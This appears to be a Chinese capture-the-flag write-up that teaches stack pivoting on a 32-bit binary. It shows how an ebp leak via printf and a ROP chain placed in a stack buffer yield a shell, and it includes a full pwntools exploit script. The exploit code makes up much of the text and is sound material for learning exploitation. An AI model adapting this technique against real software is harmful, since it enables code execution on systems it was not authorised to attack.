一道非常典型、适合用作学习栈迁移的题目。
前言
当存在栈溢出但是溢出字符数并不多的情况下,可以尝试在别处构造rop链,通过栈迁移到目标内存区域,执行rop链。这里不讲栈迁移原理,仅是对题目的分析,适合对栈迁移有初步了解的童鞋食用。
一、题目
二、题目分析
存在栈溢出,顺次有两次溢出,且溢出字节数都是8,对应栈上位置也就是ebp和ret。
1. 我们可以通过第一次溢出漏洞,覆写字符串的结束符,让printf泄露ebp内容。
2. 通过gdb调试确定泄露的ebp的值(调用者ebp)相对字符串s的偏移量
3. 在s里写入rop链,并通过溢出,将栈劫持到s,让rop发生在s中
三、exp
from pwn import *
context(arch='i386',log_level='debug')
leave_ret=0x080485FD
offset=0xffffcd58-0xffffcd20
io=process('./pwn')
io=remote('node5.anna.nssctf.cn',28203)
elf=ELF('./pwn')
# 第一次溢出1字节覆盖\x00,泄露ebp
io.sendafter(b'name?\n',b'a'*(0x28-1)+b'b')
io.recvuntil(b'aaab')
leak_ebp=u32(io.recvuntil(b'\xff'))
success(hex(leak_ebp))
target_addr=leak_ebp-offset-0x4 # -0x4是因为第二次leave;ret的时候,pop esp会导致+0x4
# 第二次溢出,rop写在s中,栈迁移到s,调用system,参数为自己写在栈上的/bin/sh,参数偏移计算可知
payload=p32(elf.plt['system'])+p32(elf.sym['_start'])+p32(leak_ebp-offset+0xc)+b'/bin/sh\x00'
payload=payload.ljust(0x28,b'a')+p32(target_addr)+p32(leave_ret)
io.send(payload)
io.interactive()